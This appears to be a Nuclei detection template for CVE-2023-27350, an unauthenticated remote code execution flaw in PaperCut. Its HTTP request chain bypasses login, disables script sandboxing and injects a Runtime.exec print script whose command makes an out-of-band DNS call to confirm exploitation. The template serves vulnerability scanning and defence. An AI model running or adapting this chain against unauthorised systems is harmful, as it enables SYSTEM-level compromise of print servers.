2023-04-25 14:03:38 +00:00
id : CVE-2023-27350
info :
name : PaperCut - Unauthenticated Remote Code Execution
author : rootxharsh,iamnoooob,pdresearch
severity : critical
description : |
This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
2023-09-06 11:43:37 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
2023-04-25 14:03:38 +00:00
reference :
- https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/
- https://nvd.nist.gov/vuln/detail/CVE-2023-27350
- https://www.papercut.com/kb/Main/PO-1216-and-PO-1219
- https://www.zerodayinitiative.com/advisories/ZDI-23-233/
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/171982/PaperCut-MF-NG-Authentication-Bypass-Remote-Code-Execution.html
2023-04-25 14:03:38 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2023-04-25 14:03:38 +00:00
cvss-score : 9.8
cve-id : CVE-2023-27350
2023-07-15 16:29:17 +00:00
cwe-id : CWE-284,NVD-CWE-Other
2024-01-14 13:49:27 +00:00
epss-score : 0.97243
epss-percentile : 0.99812
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*
2023-04-25 14:11:19 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:43:37 +00:00
max-request : 10
2023-07-11 19:49:27 +00:00
vendor : papercut
product : papercut_mf
2023-09-06 11:43:37 +00:00
shodan-query : http.html:"PaperCut"
2024-01-14 09:21:50 +00:00
tags : cve2023,cve,packetstorm,papercut,rce,oast,unauth,kev
2023-04-25 14:03:38 +00:00
variables :
cmd : "nslookup {{interactsh-url}}"
2023-04-28 10:02:24 +00:00
http :
2023-04-25 14:03:38 +00:00
- raw :
- |
GET /app?service=page/SetupCompleted HTTP/1.1
Host : {{Hostname}}
- |
POST /app HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/x-www-form-urlencoded
service=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login
- |
POST /app HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/x-www-form-urlencoded
service=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go
- |
POST /app HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/x-www-form-urlencoded
service=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update
- |
POST /app HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/x-www-form-urlencoded
service=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go
- |
POST /app HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/x-www-form-urlencoded
service=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update
- |
GET /app?service=page/PrinterList HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/x-www-form-urlencoded
service=page%2FPrinterList
- |
POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/x-www-form-urlencoded
service=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}
- |
POST /app HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/x-www-form-urlencoded
service=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4
- |
POST /app HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/x-www-form-urlencoded
service=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply
host-redirects : true
max-redirects : 2
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
- "dns"
- type : word
part : body
words :
- 'Avanceret kontering'
2023-07-11 19:49:27 +00:00
extractors :
- type : regex
name : printerID
group : 1
regex :
- 'erList\/selectPrinterCost&sp=([a-z0-9]+)">'
internal : true
part : body
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022100c43bc6a64df519a04b0c32ae002356fe4d745056e646acc1f73d048219fc0fdd022019e36e542ac51a145ed37740864eba86659fd657e0d6d986377e75bd06ca13e1:922c64590222798bb761d5b6d8e72950